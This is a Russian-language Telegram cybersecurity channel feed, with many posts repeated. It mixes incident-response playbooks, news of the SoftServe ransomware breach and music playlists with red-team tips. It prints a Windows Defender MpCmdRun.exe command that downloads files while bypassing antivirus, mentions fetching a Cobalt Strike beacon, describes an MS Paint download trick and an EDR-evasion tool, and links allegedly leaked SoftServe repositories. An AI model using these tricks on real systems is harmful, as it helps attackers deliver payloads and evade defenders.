📚 Тут подъехал набор плейбуков для различных инцидентов, каждый #playbook есть как в виде pdf так и visio файла. Естественно каждый плэйбук построен на семи шагах описаных в #NIST
▪️ Prepare
▪️ Detect
▪️Analyze
▪️Contain
▪️Eradicate
▪️Recover
▪️Post-Incident Handling
Я прошелся по нескольким, и мне как человеку который любит структурированость прямо очень понравилось. Думаю очень зайдет организациям у которых нет вообще ничего, и они не понимают от чего отталкиваться, или специалистам которые хотят попасть на сторону Blue Team и не понимают что там вообще происходит. В общем годнота.
🧃Как по мне прекрасный контент для #SOC related читателей канала 🤜🤛
#incidentresponse #IR #bestpractice #blueteam
https://www.incidentresponse.com/playbooks/
▪️ Prepare
▪️ Detect
▪️Analyze
▪️Contain
▪️Eradicate
▪️Recover
▪️Post-Incident Handling
Я прошелся по нескольким, и мне как человеку который любит структурированость прямо очень понравилось. Думаю очень зайдет организациям у которых нет вообще ничего, и они не понимают от чего отталкиваться, или специалистам которые хотят попасть на сторону Blue Team и не понимают что там вообще происходит. В общем годнота.
🧃Как по мне прекрасный контент для #SOC related читателей канала 🤜🤛
#incidentresponse #IR #bestpractice #blueteam
https://www.incidentresponse.com/playbooks/
🤯 По дружески каналам долетела информация о том что компания #SoftServe подверглась атаке вируса шифровальщика. Новая жертва хакерских группировок готовящихся провести холодную зиму на тропических, жарких островах. В тоже время как инженеры компании будут встречать Новый год в заснеженных коробках из под холодильников.
#breakingnews #ransomware
https://news.1rj.ru/str/DC8044_Info/773
#breakingnews #ransomware
https://news.1rj.ru/str/DC8044_Info/773
Telegram
DC8044 F33d
Поступает информация что похекали одну из известных ИТ компаний - SoftServe. Судя по всему компания подверглась атаке шифровальщиком. Лежит ряд сервисов. В некоторых источниках распространяется мессадж, видимо от руководства компании.
"Today at 1AM in the…
"Today at 1AM in the…
🇺🇦x_Notes🇺🇦 🔜 pinned «🤯 По дружески каналам долетела информация о том что компания #SoftServe подверглась атаке вируса шифровальщика. Новая жертва хакерских группировок готовящихся провести холодную зиму на тропических, жарких островах. В тоже время как инженеры компании будут…»
🍎 Алярм, алярм, волк унес зайчат. Разработчики малвари #Shlayer успешно обошли автоматические проверки в #AppStore для #macOS и сумели залить малварь. Ждем реакцию со стороны #Apple.
#malware
https://objective-see.com/blog/blog_0x4E.html
#malware
https://objective-see.com/blog/blog_0x4E.html
objective-see.org
Apple Approved Malware
malicious code ...now notarized!? #2020
🎧 Работая в офисе типа #openspace бывает сложно сфокусироваться, поэтому я слушаю музыку. С момента выхода #Spotify на Украинский рынок полностью мигрировал на данный музыкальный сервис.
🎸 Ниже подборка плейлистов которые я слушаю на работе, гуляя, и иногда даже читая.
#music #playlists #chill
💻 Hacker’s Coffee - типа хэккэрский плейлист, хорошо подходит для динамической работы, держит в тонусе.
https://spoti.fi/2EYSkMw
✈️ Go Pro Travel Video Background Music - прикольный плейлист с популярными треками, хорошо заходит при путешествиях на машине, и по утрам для позитивного настроения на день.
https://spoti.fi/2QOBBOG
🧘♂️ Deep Focus - отличный фоновый #ambient, позволяет расслабится и сконцентрироваться на задаче.
https://spoti.fi/2ERZZwD
📖 Reading Soundtrack - мой топ при чтении книг, отличный фон для того чтобы не мешали внешние звуки так как я люблю читать в метро или общественном транспорте. В тоже время плейлист позволяет расслабится и не обращать внимание на то что вообще играет музыка.
https://spoti.fi/3hTIASp
🤘44WAVE - это уже не Spotify, а проект DefCon Kyiv. Но музыка тоже годная, и музыкальная редакция всегда отбирает только лучшие треки для слушателей.
https://bit.ly/31NrsIv
🎸 Ниже подборка плейлистов которые я слушаю на работе, гуляя, и иногда даже читая.
#music #playlists #chill
💻 Hacker’s Coffee - типа хэккэрский плейлист, хорошо подходит для динамической работы, держит в тонусе.
https://spoti.fi/2EYSkMw
✈️ Go Pro Travel Video Background Music - прикольный плейлист с популярными треками, хорошо заходит при путешествиях на машине, и по утрам для позитивного настроения на день.
https://spoti.fi/2QOBBOG
🧘♂️ Deep Focus - отличный фоновый #ambient, позволяет расслабится и сконцентрироваться на задаче.
https://spoti.fi/2ERZZwD
📖 Reading Soundtrack - мой топ при чтении книг, отличный фон для того чтобы не мешали внешние звуки так как я люблю читать в метро или общественном транспорте. В тоже время плейлист позволяет расслабится и не обращать внимание на то что вообще играет музыка.
https://spoti.fi/3hTIASp
🤘44WAVE - это уже не Spotify, а проект DefCon Kyiv. Но музыка тоже годная, и музыкальная редакция всегда отбирает только лучшие треки для слушателей.
https://bit.ly/31NrsIv
🤠 Лучший мем про ИБ и 3е сентября, от друзей из DC8800! 😭
#mem #3rdseptember
https://news.1rj.ru/str/DC8800/124
#mem #3rdseptember
https://news.1rj.ru/str/DC8800/124
Telegram
DC8800
🔵🔵
🙂 Доброе утро. Пост для команды защищающих, но как всегда атакующие могут использовать информацию для обхода защиты. В этот раз набор плэйбуков для #threathunting. Проект #opensource и наполняется силами комьюнити. На данный момент представлены плэйбуки только для #Windows но есть заглушки для #Linux и #macOS соответственно можно расчитывать что и под эти платформы будут #playbook
P.S. Посты для #blueteam я буду отмечать двумя синими точками, для #redteam двумя красными, а для обоих команд соответственно синей и красной.
https://threathunterplaybook.com/introduction.html
🙂 Доброе утро. Пост для команды защищающих, но как всегда атакующие могут использовать информацию для обхода защиты. В этот раз набор плэйбуков для #threathunting. Проект #opensource и наполняется силами комьюнити. На данный момент представлены плэйбуки только для #Windows но есть заглушки для #Linux и #macOS соответственно можно расчитывать что и под эти платформы будут #playbook
P.S. Посты для #blueteam я буду отмечать двумя синими точками, для #redteam двумя красными, а для обоих команд соответственно синей и красной.
https://threathunterplaybook.com/introduction.html
🔴🔴
🐦 Исследователь опубликовал в Твитере новый трюк как обойти защиту #windows при скачивании файлов.
🤔 Метод заключается в том чтобы скачать файл при помощи консольной версии “Microsoft Malware Protection” это успех!
Код позволяющий скачивать файлы:
#WindowsDefender #bypass #av #redteam #MalwareProtection
https://twitter.com/mohammadaskar2/status/1301263551638761477
🐦 Исследователь опубликовал в Твитере новый трюк как обойти защиту #windows при скачивании файлов.
🤔 Метод заключается в том чтобы скачать файл при помощи консольной версии “Microsoft Malware Protection” это успех!
Код позволяющий скачивать файлы:
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>#WindowsDefender #bypass #av #redteam #MalwareProtection
https://twitter.com/mohammadaskar2/status/1301263551638761477
X (formerly Twitter)
Askar 🇵🇸 (@mohammadaskar2) on X
Well, you can download a file from the internet using Windows Defender itself.
In this example, I was able to download Cobalt Strike beacon using the binary "MpCmdRun.exe" which is the "Microsoft Malware Protection Command Line".
In this example, I was able to download Cobalt Strike beacon using the binary "MpCmdRun.exe" which is the "Microsoft Malware Protection Command Line".
😱 #Breakingnews тут на канале @freedomf0x опубликовали пачку файликов которые как утверждается имеют отношение в недавнему взлому компании #SoftServe в архивах содержатся #git репозитории с программным кодом
‼️ Достоверность информации не проверена на данный момент, но может у кого из вас есть время проверить.‼️
https://news.1rj.ru/str/freedomf0x/9467
https://news.1rj.ru/str/freedomf0x/9468
https://news.1rj.ru/str/freedomf0x/9469
https://news.1rj.ru/str/freedomf0x/9470
https://news.1rj.ru/str/freedomf0x/9471
https://news.1rj.ru/str/freedomf0x/9472
https://news.1rj.ru/str/freedomf0x/9473
https://news.1rj.ru/str/freedomf0x/9474
‼️ Достоверность информации не проверена на данный момент, но может у кого из вас есть время проверить.‼️
https://news.1rj.ru/str/freedomf0x/9467
https://news.1rj.ru/str/freedomf0x/9468
https://news.1rj.ru/str/freedomf0x/9469
https://news.1rj.ru/str/freedomf0x/9470
https://news.1rj.ru/str/freedomf0x/9471
https://news.1rj.ru/str/freedomf0x/9472
https://news.1rj.ru/str/freedomf0x/9473
https://news.1rj.ru/str/freedomf0x/9474
❗️UPD: Некоторые конфиг файлы прямо указывают на то что по крайней мере один репозиторий имеет отношение к компании #SoftServe
⚙️ Всем привет. С ботом который отвечает за постинг в канал возникли проблемы, поэтому новостей не было, буду наверстывать.
❗️Компания #Cisco выпустила обновления безопасности для своих продуктов, по ссылке информация о закрытых уязвимостях. Обновите свои продукты от этого вендора.
#news #patch #vulnerabilities
https://tools.cisco.com/security/center/publicationListing.x
❗️Компания #Cisco выпустила обновления безопасности для своих продуктов, по ссылке информация о закрытых уязвимостях. Обновите свои продукты от этого вендора.
#news #patch #vulnerabilities
https://tools.cisco.com/security/center/publicationListing.x
🔥🔥🔥
Прекрасный материал о том как готовили задания для #CTFZone соревнований. Думаю будет полезным тем кто готовит CTF с упором на практические задания. @Betepo_Ok good job👍
#writeup #architecture #ctf
https://medium.com/@offzone.conf/ctfzone-paper-trust-area-backend-part-33526dff5a9c
Прекрасный материал о том как готовили задания для #CTFZone соревнований. Думаю будет полезным тем кто готовит CTF с упором на практические задания. @Betepo_Ok good job👍
#writeup #architecture #ctf
https://medium.com/@offzone.conf/ctfzone-paper-trust-area-backend-part-33526dff5a9c
Medium
CTFZone Paper: Trust Area — Backend Part
By Arkadiy Litvinenko
😎 На mc.today вышла заметка на тему взлома #SoftServe с моим коментарием. Лайк, подписка, коментарий привествуются. 😉
#mctoday #publicrelations #comment
https://mc.today/hakerskaya-ataka-na-softserve-kak-eto-proizoshlo-i-ukrali-li-dannye-klientov/
#mctoday #publicrelations #comment
https://mc.today/hakerskaya-ataka-na-softserve-kak-eto-proizoshlo-i-ukrali-li-dannye-klientov/
MC.today, Media for Creators
Хакерская атака на SoftServe: как это произошло и украли ли данные клиентов
Хакеры взломали украинскую IT-компанию SoftServe и, возможно, получили доступ к некоторым данным. Кибераналитик компании Hacken Сергей Харюк рассказал MC.today, что произошло.
👽 Тут на неком уважаемом форуме вышел мануал как собрать себе среду для решения заданий #flareon, это такие соревнования по #reverseengineering
😃 Парни видимо “очень старались” у них не было времени объяснять, поэтому output из google translate решили выдать за мануал
😎 Вторая ссылка ведёт на оригинальный репозиторий, с нормальным мануалом. Пользуйтесь проверенными источниками, и не потребляйте дешевые материалы созданные ради количества.
#lulz #friday #fun
codeby{.}net/threads/flare-vm-nastrojka-rabochego-okruzhenija-dlja-revers-inzhiniringa-i-analiza-vredonosnyx-programm.67909/
https://github.com/fireeye/flare-vm
😃 Парни видимо “очень старались” у них не было времени объяснять, поэтому output из google translate решили выдать за мануал
😎 Вторая ссылка ведёт на оригинальный репозиторий, с нормальным мануалом. Пользуйтесь проверенными источниками, и не потребляйте дешевые материалы созданные ради количества.
#lulz #friday #fun
codeby{.}net/threads/flare-vm-nastrojka-rabochego-okruzhenija-dlja-revers-inzhiniringa-i-analiza-vredonosnyx-programm.67909/
https://github.com/fireeye/flare-vm
GitHub
GitHub - mandiant/flare-vm: A collection of software installations noscripts for Windows systems that allows you to easily setup…
A collection of software installations noscripts for Windows systems that allows you to easily setup and maintain a reverse engineering environment on a VM. - mandiant/flare-vm
🔴🔴
🔒 Если #antivirus или #edr не дает вам спокойно жить, и блокирует все ваши активности в рамках #redteam операций, если вы хотите узнать какое решение какие использует методы сбора телеметрии. То держите тулу которая поможет посмотреть какую телеметрию собирает то или инное решение, какие хуки оно устанавливает, в следствии чего вы сможете подготовиться так, чтобы ни один #blueteam не обнаружил ваших шаловливых действий.😉
👨✈️ Защищающая сторона, сорян вам это мало поможет.
#bypass #telemetry #hook
https://github.com/jthuraisamy/TelemetrySourcerer
🔒 Если #antivirus или #edr не дает вам спокойно жить, и блокирует все ваши активности в рамках #redteam операций, если вы хотите узнать какое решение какие использует методы сбора телеметрии. То держите тулу которая поможет посмотреть какую телеметрию собирает то или инное решение, какие хуки оно устанавливает, в следствии чего вы сможете подготовиться так, чтобы ни один #blueteam не обнаружил ваших шаловливых действий.😉
👨✈️ Защищающая сторона, сорян вам это мало поможет.
#bypass #telemetry #hook
https://github.com/jthuraisamy/TelemetrySourcerer
GitHub
GitHub - jthuraisamy/TelemetrySourcerer: Enumerate and disable common sources of telemetry used by AV/EDR.
Enumerate and disable common sources of telemetry used by AV/EDR. - jthuraisamy/TelemetrySourcerer
⚙️🛠
@ControllerBot опять пал смертью храбрых, поэтому посты буду в ручном порядке, ну и парочку тестовых через другие сервисы. Пока буду выбирать сервис для ведения канала, будут проскакивать тестовые посты. Прощу прощения за временные неудобства.
🤒🤕
@ControllerBot опять пал смертью храбрых, поэтому посты буду в ручном порядке, ну и парочку тестовых через другие сервисы. Пока буду выбирать сервис для ведения канала, будут проскакивать тестовые посты. Прощу прощения за временные неудобства.
🤒🤕
🔴🔴
😈 Забавный способ скачать файл при помощи #MS #Paint. Мне кажется мало какой продукт додумается трекать скачивание таким методом.
#filedownload #redteam
https://twitter.com/indishell1046/status/1301855486661332994
😈 Забавный способ скачать файл при помощи #MS #Paint. Мне кажется мало какой продукт додумается трекать скачивание таким методом.
#filedownload #redteam
https://twitter.com/indishell1046/status/1301855486661332994
Twitter
Manish Kishan Tanwar
People are sharing lolbin POCs. here goes from my side :) Open MSPaint Navigate to below mentioned functional path: File -> Open -> "File name" (All Files) Specify the file HTTP file path URL. wait for error message. And get the download file path in error…
🙂 Доброе утро понедельника.
🔐 если вам не хватает стандартных настроек безопасности при хранении файлов в облачных сервисах, то специально для вас сервис #ProtonMail презентовал новый сервис #ProtonDrive. Создатели анонсировали e2e шифрование и отлично проработанную архитектуру безопасности для хранения файлов.
🧐 Учитывая тенденцию утечек которая все никак не прекратится, мне кажется что подобные сервисы будут обретать популярность, поскольку люди хотят свои тайны держать в секрете. А у #ProtonDrive ещё и юрисдикция отличная. Интересно чем конкуренты будут атаковать рынок?
#cloudstorage #news #encryption
https://protonmail.com/blog/protondrive-security/
🔐 если вам не хватает стандартных настроек безопасности при хранении файлов в облачных сервисах, то специально для вас сервис #ProtonMail презентовал новый сервис #ProtonDrive. Создатели анонсировали e2e шифрование и отлично проработанную архитектуру безопасности для хранения файлов.
🧐 Учитывая тенденцию утечек которая все никак не прекратится, мне кажется что подобные сервисы будут обретать популярность, поскольку люди хотят свои тайны держать в секрете. А у #ProtonDrive ещё и юрисдикция отличная. Интересно чем конкуренты будут атаковать рынок?
#cloudstorage #news #encryption
https://protonmail.com/blog/protondrive-security/
Proton
The Proton Drive security model | Proton
Learn how Proton Drive uses end-to-end encryption to protect your photos, documents, and other sensitive data.
🔴🔴
🚨 Команда красный уходит в отрыв по количеству полезных для них постов на данном канале. Сегодня у нас очередная подборка из разряда #awesome чего-то там на #github
⚒ Внутри подборки собраны инструменты которые помогут похекать все что угодно, подборка отсортирована по стадиям атаки. Если вы в #redteaming то большую часть тулзов и так знаете, но возможно сможете найти что-то новое или полезное для себя.
#redteam #collection #tools
https://github.com/infosecn1nja/Red-Teaming-Toolkit
🚨 Команда красный уходит в отрыв по количеству полезных для них постов на данном канале. Сегодня у нас очередная подборка из разряда #awesome чего-то там на #github
⚒ Внутри подборки собраны инструменты которые помогут похекать все что угодно, подборка отсортирована по стадиям атаки. Если вы в #redteaming то большую часть тулзов и так знаете, но возможно сможете найти что-то новое или полезное для себя.
#redteam #collection #tools
https://github.com/infosecn1nja/Red-Teaming-Toolkit
GitHub
GitHub - infosecn1nja/Red-Teaming-Toolkit: This repository contains cutting-edge open-source security tools (OST) for a red teamer…
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter. - infosecn1nja/Red-Teaming-Toolkit